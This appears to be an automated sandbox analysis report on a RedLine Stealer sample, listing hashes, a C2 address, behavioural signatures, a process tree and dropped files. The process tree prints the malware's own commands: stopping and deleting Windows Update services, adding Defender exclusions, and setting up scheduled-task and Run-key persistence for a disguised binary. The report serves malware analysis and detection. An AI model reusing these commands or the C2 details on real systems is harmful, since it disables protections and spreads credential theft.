Analysis
- max time kernel: 150s
- max time network: 139s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28/01/2023, 19:36
Static task: static1
Behavioral task: behavioral1
- Sample: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
- Resource: win7-20221111-en
Behavioral task: behavioral2
- Sample: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
- Resource: win10v2004-20220812-en
General
- Target: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
- Size: 361KB
- MD5: 18852c1659b6641a1f4eeacf6ce6bb8d
- SHA1: 1d678410484e34165adb652f7e86a2b5cae5f58d
- SHA256: 34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
- SHA512: 86295df5931e4673fc6579c1d6425040dbf44c6fbd5c19a35228f1c9f8d4917944c8ff020998d4504853398e7640664bf10c275835b1bfa7a236a073ed518b74
- SSDEEP: 6144:lUNamFD8LPUsNuwibRhinAoCRH+SXm+iMvOfcLpp0AdgqMGjEAOe75wBNEj+nc:lUFD8LPaw2RhinATReSXmPMvBBdqZBNU
Malware Config
Extracted
- Family: redline
- Botnet: 1
- C2: 107.182.129.73:21733
- auth_value: 3a5bb0917495b4312d052a0b8977d2bb
Signatures
- Modifies security service (2 TTPs, 5 IoCs)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine payload (1 IoC)
  - YARA rule family_redline matched resource behavioral2/memory/3872-174-0x00000000003E0000-0x0000000000400000-memory.dmp
- Suspicious use of NtCreateProcessExOtherParentProcess (4 IoCs)
  - PID 3716 created 3296 (WerFault.exe, procid_target 56)
  - PID 2384 created 4404 (WerFault.exe, procid_target 61)
  - PID 388 created 4788 (WerFault.exe, procid_target 134)
  - PID 2524 created 1812 (WerFault.exe, procid_target 137)
- Suspicious use of NtCreateUserProcessOtherParentProcess (8 IoCs)
  - PID 4224 created 2864 (SmartDefRun.exe, procid_target 54)
  - PID 4224 created 2864 (SmartDefRun.exe, procid_target 54)
  - PID 4224 created 2864 (SmartDefRun.exe, procid_target 54)
  - PID 3568 created 604 (powershell.EXE, procid_target 7)
  - PID 4956 created 3296 (svchost.exe, procid_target 56)
  - PID 4956 created 4404 (svchost.exe, procid_target 61)
  - PID 4956 created 4788 (svchost.exe, procid_target 134)
  - PID 4956 created 1812 (svchost.exe, procid_target 137)
- Blocklisted process makes network request (1 IoC)
  - flow 17: PID 4308 powershell.exe
- Downloads MZ/PE file
- Drops file in Drivers directory (1 IoC)
  - File created: C:\Windows\System32\drivers\etc\hosts (SmartDefRun.exe)
- Executes dropped EXE (5 IoCs)
  - PID 1692 C4Loader.exe
  - PID 4788 new2.exe
  - PID 4876 SysApp.exe
  - PID 4224 SmartDefRun.exe
  - PID 3796 fodhelper.exe
- Stops running service(s) (3 TTPs)
- Uses the VBS compiler for execution (1 TTP)
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Drops file in System32 directory (16 IoCs)
- Suspicious use of SetThreadContext (4 IoCs)
  - PID 4304 set thread context of 2548 (1d678410484e34165adb652f7e86a2b5cae5f58d.exe, procid_target 81)
  - PID 4788 set thread context of 3872 (new2.exe, procid_target 92)
  - PID 4224 set thread context of 208 (SmartDefRun.exe, procid_target 121)
  - PID 3568 set thread context of 3312 (powershell.EXE, procid_target 126)
- Drops file in Program Files directory (1 IoC)
  - File created: C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe (SmartDefRun.exe)
- Launches sc.exe (5 IoCs)
  sc.exe is a Windows utility to control services on the system.
  - PID 2136 sc.exe
  - PID 2836 sc.exe
  - PID 5088 sc.exe
  - PID 4924 sc.exe
  - PID 3660 sc.exe
- Program crash (6 IoCs)
  - PID 1220 WerFault.exe, pid_target 4304 (procid_target 79)
  - PID 2356 WerFault.exe, pid_target 4788 (procid_target 88)
  - PID 4420 WerFault.exe, pid_target 3296 (procid_target 56)
  - PID 212 WerFault.exe, pid_target 4404 (procid_target 61)
  - PID 2288 WerFault.exe, pid_target 4788 (procid_target 134)
  - PID 3460 WerFault.exe, pid_target 1812 (procid_target 137)
- Checks processor information in registry (2 TTPs, 12 IoCs)
  Processor information is often read in order to detect sandboxing environments.
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - PID 2472 schtasks.exe
  - PID 2732 schtasks.exe
- Enumerates system info in registry (2 TTPs, 8 IoCs)
- Modifies data under HKEY_USERS (64 IoCs)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  - PID 2864 Explorer.EXE
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- C:\Windows\system32\lsass.exe (PID 656)
  Command line: C:\Windows\system32\lsass.exe
- C:\Windows\system32\winlogon.exe (PID 604)
  Command line: winlogon.exe
  - C:\Windows\system32\dwm.exe (PID 1020)
    Command line: "dwm.exe"
  - C:\Windows\System32\dllhost.exe (PID 3312)
    Command line: C:\Windows\System32\dllhost.exe /Processid:{08fd132a-ab62-410b-aeff-5b11da57393e}
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
- C:\Windows\system32\svchost.exe (PID 432)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe (PID 744)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe (PID 504)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe (PID 940)
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe (PID 1028)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe (PID 1124)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  Signatures: Drops file in System32 directory
  - C:\Windows\system32\taskhostw.exe (PID 2516)
    Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "<obfuscated PowerShell script omitted>"
    Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
    PID: 4784
    - C:\Windows\System32\Conhost.exe (PID 4316)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "<obfuscated PowerShell script omitted>"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4820
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:3796 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"3⤵
- Creates scheduled task(s)
PID:2732 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4304
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1344
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2364
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2024
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2176
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2456
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2716
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2864 -
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:1692
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 1406⤵
- Program crash
PID:2356
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4876 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:2472 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\System32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:2136
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:2836
-
-
C:\Windows\System32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:5088
-
-
C:\Windows\System32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:4924
-
-
C:\Windows\System32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f7⤵PID:4280
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f7⤵PID:1980
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f7⤵
- Modifies security service
PID:2156
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f7⤵PID:4420
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f7⤵PID:1988
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 2563⤵
- Program crash
PID:1220
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:208
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3128
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3296
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3296 -s 6722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3452
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3736
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4404
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4404 -s 3922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:212
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:3600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2752
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:3488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4304 -ip 43042⤵PID:5036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4788 -ip 47882⤵PID:3620
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 544 -p 4404 -ip 44042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2384
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 3296 -ip 32962⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3716
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 4788 -ip 47882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:388
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 1812 -ip 18122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2524
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4232
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4788
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4788 -s 2962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2288
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1812
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1812 -s 3042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3460
-
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize 39KB
MD5 4077cbffe145b53eedaba023e99ec5a1
SHA1 8b45ed487c366cca13d225cfe1c06bd57c9363b1
SHA256 d0b4c15d7cb8a33a8948e19496ca12766624df9a8c8949d532aaa337ff7f9150
SHA512 7c96bc3267890592743ed9bf501b2db8931f87f3c2db2f3b6f6dff06b7344974f0dfb6e619d30d8c95627e2c8e57230098dbf80b8a5b37450b794b3ad0b6f127

Filesize 13KB
MD5 4a42b14423811b54930095ec651cee2b
SHA1 8459e4a12b4ecb3ea6e00a04876550e40f9673e3
SHA256 8fec1b1c248f2b06e5ffe350f70df64802eae858d4ae82bb1e476d88b7ccf076
SHA512 82cd965de83d8279991562ffccccf50d760b34081ae3d37436ac328addb103f87ebf14ccde28ae61ca55813328c79d4b356dec160b6ad0534c5276af121558ba

Filesize 37KB
MD5 4adcc8074385e3acade220cbbecaa6ef
SHA1 c65542f29e3f85bcfcf581e3064971595ec5e3a3
SHA256 0b352f1ba10e6fa20190f1238dc044397de43fd26c68d6bd0023b8b6f377044f
SHA512 a9ca078330b2de52dd265707346f4cb36f291bb248be7de3170b0eba87eec15cc999edeb01926100b92719e9ef9c2a138b952d1d3ee133df8664220a822e4ae2

Filesize 13KB
MD5 891716316e5adfa8e82b164d631e91be
SHA1 a41ed314199a082df52e4671a8d7e476bae4652f
SHA256 c991337d6159f9511c17e970c066bbf867ffe8d376cab3a3c8757b143f0627fb
SHA512 1ae9e0df7f99509be9fcc4d84fcdef637f308f4fe87f2da50c663049c74154c5e6e6f960aa5ebf16d3dd5ec5ba700a2b3d1a521fa45f6d0c30108399caf4002d

Filesize 36KB
MD5 56b63c978d3e4d0c1e4c37b299b989c4
SHA1 969acb629ee199d59acefaf896f1a958002eb95b
SHA256 ba9bfee6a1f9b717dfc70fc3f923777cdd5cdfe2861a9baab588a6e8f842fe67
SHA512 399d48ddbffd72a1679e226384baab70da9d05af7bd202679ae49530b1df65420ab4a31892db41279742a577f7c77d5a51027e15f3f5220df6217bdfa6ef8942

Filesize 13KB
MD5 ddc89262ea408973fc90150d103a01dc
SHA1 2dfdd7a503a0b8cfa0f124034ef01b8eebb7e187
SHA256 c3628d4f5aa96ad098840d9988fe0a2d0779489dc54c88c0674512ed26ce13c2
SHA512 7c9852d1a7fd92d986bab8a04d1690afde13bf06b743449365e9057e59e38fcb415cfa33205f5f696be86699344893dfc66332816b0bdf1e096b3b4c444fe494

Filesize 36KB
MD5 668a4588155ae49bc286d1e265ca62fa
SHA1 5e64f3abec56a048c54e560a664fc01c5827bcda
SHA256 bc23857c8c0b5f505e51981ba7f14ddfff0cf25179884af9f62c9144769a42e1
SHA512 6350260ddf09614cced381c0dd771e9a0c2d4b4a132c3c7401613a768e60b4741df1538bdb4b54e64ba212983bbcaebe96a2587ecc352ce9d0bdde9c932dbbf5

Filesize 13KB
MD5 f6ef366aac8b477455aa935f1df41cb7
SHA1 995420eaeadf040cafbf9cee7f1887708dd3e4ac
SHA256 72db396cc89850d1089382fe76c5233529a7f38498445640b7e7d044f6c4049d
SHA512 3afb5638d7ad17cc7a7f8ce6ebecf097e6fbcae86e0b370177233e54010f3173415ceef3460c49b86f25159a1c01c240a0ff1b304efb8062cc58639b7a04af03

Filesize 2KB
MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize 19KB
MD5 8436a99949404ca88131bbc67ce7b1f9
SHA1 2781b16bfe5ed37d769c28f4235c9fd24a27a367
SHA256 31914a5856616650e92e99ec376a5e7b453019be76d72703430a3b6482c8e2c3
SHA512 e9ee8de928055a159ceb1ece8100afa70a86346ef133005889f661e8deef30bd05238fdb59053748875e05e7ada17fa8eb4f663161ceb72189123e068b1b7233

Filesize 948B
MD5 a7ce8cefc3f798abe5abd683d0ef26dd
SHA1 b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA256 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512 c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Filesize 512KB
MD5 cb925a87cb2bb91f7d595dddc81324eb
SHA1 7c6826f74094a560b3290730ac6b9a41b88363cf
SHA256 ee916f82bd0c2419c8d8996128af2c05bf8501de7bfcc44cf60e82696c901d30
SHA512 4d3271a7567cb4e615ec771e1d7b36131d545955921b3df69302334a6183a0384f13ddd643159671c5e84490f6d14c7d4a573de5e5c87b2ae506a81b67e970e1

Filesize 14.0MB
MD5 4882ac82a8f75a992c2b1c883a14d727
SHA1 c41e80569641316438938f9cc25ecc3d11c6aaae
SHA256 e5e9441684438d0fb0e78b9eb9eb5d71eb89dff76a9e25b3a95f6df3e21b603b
SHA512 a03aafa466ccb28ebcbf77d8d490a0c7bae83fbdca9bfffc43af25f9174898fdff4948e8fc347b746923662dfbe5a78dc43acb4bc936acdd9360c4ea735a9cba

Filesize 16KB
MD5 104be2fbe4b86ab2e0ebfe43816db5ab
SHA1 0812bc7d9464c7dc139ffe94aabbfb0bec411786
SHA256 344c0563696ce289867c1c5db6a5b485e7ebd9f8abd4114829c5aeb9682f506c
SHA512 03a3e4c352882c947c351cbbc2dddb23c5379968a58200a0b1007c5ed14ff2b582e7d72138fdd78b6e1a4a1b63453cd2d6dc925c0833916986a7e4ec4331789c

Filesize 1.4MB
MD5 bb86a343080f9f4696c250ef31a18d9d
SHA1 43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Filesize 1.4MB
MD5 bb86a343080f9f4696c250ef31a18d9d
SHA1 43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Filesize 3.7MB
